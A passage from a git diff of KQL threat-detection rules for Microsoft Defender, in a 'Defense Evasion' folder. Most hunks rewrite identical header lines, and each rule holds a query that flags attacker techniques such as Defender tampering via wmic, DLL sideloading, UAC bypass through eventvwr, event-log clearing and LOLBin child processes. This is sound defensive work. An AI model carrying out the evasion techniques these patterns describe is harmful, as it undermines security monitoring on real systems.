ProcessCommandLine contains "Crowdstrike Sensor" or ProcessCommandLine contains "Cylance " or ProcessCommandLine contains "Dell Threat Defense" or ProcessCommandLine contains "DLP Endpoint" or ProcessCommandLine contains "Endpoint Detection" or ProcessCommandLine contains "Endpoint Protection" or ProcessCommandLine contains "Endpoint Security" or ProcessCommandLine contains "Endpoint Sensor" or ProcessCommandLine contains "ESET File Security" or ProcessCommandLine contains "LogRhythm System Monitor Service" or ProcessCommandLine contains "Malwarebytes" or ProcessCommandLine contains "McAfee Agent" or ProcessCommandLine contains "Microsoft Security Client" or ProcessCommandLine contains "Sophos Anti-Virus" or ProcessCommandLine contains "Sophos AutoUpdate" or ProcessCommandLine contains "Sophos Credential Store" or ProcessCommandLine contains "Sophos Management Console" or ProcessCommandLine contains "Sophos Management Database" or ProcessCommandLine contains "Sophos Management Server" or ProcessCommandLine contains "Sophos Remote Management System" or ProcessCommandLine contains "Sophos Update Manager" or ProcessCommandLine contains "Threat Protection" or ProcessCommandLine contains "VirusScan" or ProcessCommandLine contains "Webroot SecureAnywhere" or ProcessCommandLine contains "Windows Defender")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql
index 890d0fc3..37b7fd37 100644
--- a/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql
+++ b/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql
@@ -1,12 +1,12 @@
-// Title: Potential Wazuh Security Platform DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-03-13
-// Level: medium
-// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)
-
-DeviceImageLoadEvents
+// Title: Potential Wazuh Security Platform DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-13
+// Level: medium
+// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql b/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql
index 06c7af4f..b368d77c 100644
--- a/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql
+++ b/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql
@@ -1,10 +1,10 @@
-// Title: Potential WerFault ReflectDebugger Registry Value Abuse
-// Author: X__Junior
-// Date: 2023-05-18
-// Level: high
-// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.003
-
-DeviceRegistryEvents
+// Title: Potential WerFault ReflectDebugger Registry Value Abuse
+// Author: X__Junior
+// Date: 2023-05-18
+// Level: high
+// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql b/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql
index cdd5f21a..f80dbf78 100644
--- a/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql
+++ b/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potential Windows Defender Tampering Via Wmic.EXE
-// Author: frack113
-// Date: 2022-12-11
-// Level: high
-// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1562
-
-DeviceProcessEvents
+// Title: Potential Windows Defender Tampering Via Wmic.EXE
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1562
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/Namespace:\\\\root\\Microsoft\\Windows\\Defender" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql b/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql
index fb937ab7..953859b2 100644
--- a/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql
+++ b/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql
@@ -1,10 +1,10 @@
-// Title: Potential Winnti Dropper Activity
-// Author: Alexander Rausch
-// Date: 2020-06-24
-// Level: high
-// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-
-DeviceFileEvents
+// Title: Potential Winnti Dropper Activity
+// Author: Alexander Rausch
+// Date: 2020-06-24
+// Level: high
+// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceFileEvents
 | where FolderPath endswith "\\gthread-3.6.dll" or FolderPath endswith "\\sigcmm-2.4.dll" or FolderPath endswith "\\Windows\\Temp\\tmp.bat"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql b/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql
index 060564f2..81e30852 100644
--- a/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql
+++ b/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-20
-// Level: medium
-// Description: Detects usage of Dsacls to grant over permissive permissions
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate administrators granting over permissive permissions to users
-
-DeviceProcessEvents
+// Title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects usage of Dsacls to grant over permissive permissions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate administrators granting over permissive permissions to users
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " /G " and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") and (ProcessCommandLine contains "GR" or ProcessCommandLine contains "GE" or ProcessCommandLine contains "GW" or ProcessCommandLine contains "GA" or ProcessCommandLine contains "WP" or ProcessCommandLine contains "WD")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql b/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql
index 5b68fc1a..e4df4694 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-14
-// Level: high
-// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1127
-
-DeviceProcessEvents
+// Title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-14
+// Level: high
+// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Roaming\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\") and (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql b/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql
index 707953c1..47897836 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious Cabinet File Expansion
-// Author: Bhabesh Raj, X__Junior (Nextron Systems)
-// Date: 2021-07-30
-// Level: medium
-// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - System administrator Usage
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Cabinet File Expansion
+// Author: Bhabesh Raj, X__Junior (Nextron Systems)
+// Date: 2021-07-30
+// Level: medium
+// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - System administrator Usage
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "-F:" or ProcessCommandLine contains "/F:" or ProcessCommandLine contains "–F:" or ProcessCommandLine contains "—F:" or ProcessCommandLine contains "―F:") and FolderPath endswith "\\expand.exe") and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Admin$\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\C$\\" or ProcessCommandLine contains "\\Temporary Internet") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) and (not((ProcessCommandLine contains 
"C:\\ProgramData\\Dell\\UpdateService\\Temp\\" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql b/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql
index e22d49ca..06dd67fe 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Call To Win32_NTEventlogFile Class
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-07-13
-// Level: high
-// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Call To Win32_NTEventlogFile Class
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-13
+// Level: high
+// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Win32_NTEventlogFile" and (ProcessCommandLine contains ".BackupEventlog(" or ProcessCommandLine contains ".ChangeSecurityPermissions(" or ProcessCommandLine contains ".ChangeSecurityPermissionsEx(" or ProcessCommandLine contains ".ClearEventLog(" or ProcessCommandLine contains ".Delete(" or ProcessCommandLine contains ".DeleteEx(" or ProcessCommandLine contains ".Rename(" or ProcessCommandLine contains ".TakeOwnerShip(" or ProcessCommandLine contains ".TakeOwnerShipEx(")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql
index f45aa3dd..b296f73d 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious Child Process Of DiskShadow.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-09-15
-// Level: medium
-// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Child Process Of DiskShadow.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-15
+// Level: medium
+// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\diskshadow.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql
index 83cb720b..85740b3c 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious Child Process Of Regsvr32
-// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-05-05
-// Level: high
-// Description: Detects potentially suspicious child processes of "regsvr32.exe".
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.010
-// False Positives:
-// - Unlikely, but can rarely occur. Apply additional filters accordingly.
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Child Process Of Regsvr32
+// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-05
+// Level: high
+// Description: Detects potentially suspicious child processes of "regsvr32.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Unlikely, but can rarely occur. Apply additional filters accordingly.
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (not((ProcessCommandLine contains " -u -p " and FolderPath endswith "\\werfault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql
index 8b1a76b6..7f7bb963 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious Child Processes Spawned by ConHost
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-02-05
-// Level: high
-// Description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1202, attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`.
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Child Processes Spawned by ConHost
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1202, attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`.
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "cscript.exe", "mshta.exe", "powershell_ise.exe", "powershell.exe", "pwsh.dll", "regsvr32.exe", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\conhost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql
index 44e61799..996d8e1c 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql
@@ -1,13 +1,13 @@
-// Title: Potentially Suspicious CMD Shell Output Redirect
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-12
-// Level: medium
-// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
-// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives
-
-DeviceProcessEvents
+// Title: Potentially Suspicious CMD Shell Output Redirect
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: medium
+// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
+// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and (((ProcessCommandLine contains ">" and ProcessCommandLine contains "%APPDATA%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TEMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%USERPROFILE%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\ProgramData\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Temp\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Users\\Public\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Windows\\Temp\\")) or ((ProcessCommandLine contains " >" or ProcessCommandLine contains "\">" or ProcessCommandLine contains "'>") and (ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql
index 990a907d..ad4ecb69 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious DLL Registered Via Odbcconf.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-22
-// Level: high
-// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.008
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potentially Suspicious DLL Registered Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: high
+// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "REGSVR " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql b/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql
index b82c97a4..7a48ac32 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious DMP/HDMP File Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-09-07
-// Level: medium
-// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.
-
-DeviceFileEvents
+// Title: Potentially Suspicious DMP/HDMP File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-07
+// Level: medium
+// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql b/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql
index 9543cafb..da91e6df 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Event Viewer Child Process
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-03-19
-// Level: high
-// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Event Viewer Child Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
index 6b6db9ad..024f6650 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Execution From Parent Process In Public Folder
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-02-25
-// Level: high
-// Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1564, attack.t1059
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Execution From Parent Process In Public Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1564, attack.t1059
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript")) and InitiatingProcessFolderPath contains ":\\Users\\Public\\"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql
index 18f82a6f..eac2a502 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql
